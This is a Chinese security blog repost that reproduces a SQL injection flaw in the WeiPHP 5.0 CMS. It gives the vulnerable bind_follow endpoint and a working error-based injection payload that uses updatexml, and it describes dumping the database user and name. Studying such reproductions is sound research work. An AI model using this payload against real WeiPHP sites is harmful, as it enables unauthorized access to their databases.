WeiPHP5.0 SQL注入漏洞2

admin 2022年5月7日00:09:30安全文章 代码审计评论13 views844字阅读2分48秒阅读模式

本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。

漏洞描述

WeiPHP5.0是在2019年停止更新的一个系统,漏洞挺多的,跟着复现分析一下,前面分析了一处由于拼接造成的注入,这里复现一下 WeiPHP5.0的另一个SQL注入漏洞

漏洞影响

WeiPHP5.0最新版

可以据此下载

https://www.weiphp.cn/doc/download_source_installation.html

漏洞复现

访问如下链接并抓包

/index.php/home/Index/bind_follow
publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+

post或者 get都可以,这里开了调试模式,因此可以使用报错注入

WeiPHP5.0 SQL注入漏洞2
img

爆用户名

WeiPHP5.0 SQL注入漏洞2
img

爆数据库

WeiPHP5.0 SQL注入漏洞2
img

总结

之前对于 thinkphp开发的系统很少去弄 SQL相关的分析,因为觉得 thinkphp可能做得比较完美了,但经过这一次的分析,觉得还是很有开发的潜力。

参考链接

  • http://wiki.peiqi.tech/wiki/cms/WeiPHP/WeiPHP5.0%20bind_follow%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

github 链接:https://github.com/N0puple/vulPOC

想要获取更多资讯,或者获取文中环境可以关注公众号 “安全漏洞复现”,回复 “漏洞环境”

往期回顾

WeiPHP5.0 SQL注入漏洞1

WeiPHP5.0 前台任意文件读取

WeiPHP5.0 前台任意文件上传漏洞

DedeCMS V5.7 SP2 前台文件上传漏洞(CVE-2018-20129)

DedeCMS V5.7 前台任意用户密码修改漏洞


原文始发于微信公众号(安全漏洞复现):WeiPHP5.0 SQL注入漏洞2

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月7日00:09:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  WeiPHP5.0 SQL注入漏洞2 http://cn-sec.com/archives/982404.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: